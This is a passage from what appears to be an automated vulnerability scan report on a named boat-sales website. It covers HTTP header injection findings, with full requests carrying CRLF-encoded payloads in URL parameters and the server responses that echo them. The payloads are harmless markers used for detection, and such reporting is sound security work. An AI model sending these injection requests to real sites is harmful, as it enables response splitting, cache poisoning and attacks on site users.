savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

2. HTTP header injection
There are 13 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/Power/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 78c71%0d%0a9de75d3bc43 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/78c71%0d%0a9de75d3bc43/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:57:52 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/78c71
9de75d3bc43

Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8


<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.2. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/Sail/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a9e7b%0d%0a05f58214b4d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/a9e7b%0d%0a05f58214b4d/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:59:34 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/a9e7b
05f58214b4d

Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8


<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.3. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into the Location response header. The payload a2fcb%0d%0adec8bd846ab was submitted in the &ywo parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=a2fcb%0d%0adec8bd846ab& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:40:53 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab
&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab&">here</a>

2.4. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the Location response header. The payload 5e98e%0d%0a04055d8196f was submitted in the hosturl parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=5e98e%0d%0a04055d8196f&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:37 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f
&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f&&ywo=starlingmarine&">here</a>

2.5. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload a0d07%0d%0ac827c8a1387 was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=a0d07%0d%0ac827c8a1387&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:07 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387
&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 195

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.6. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload edada%0d%0acbdfc443266 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=edada%0d%0acbdfc443266&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:55 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266
&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 197

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the currency request parameter is copied into the Location response header. The payload 3e221%0d%0a5b524a18b0d was submitted in the currency parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=3e221%0d%0a5b524a18b0d&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
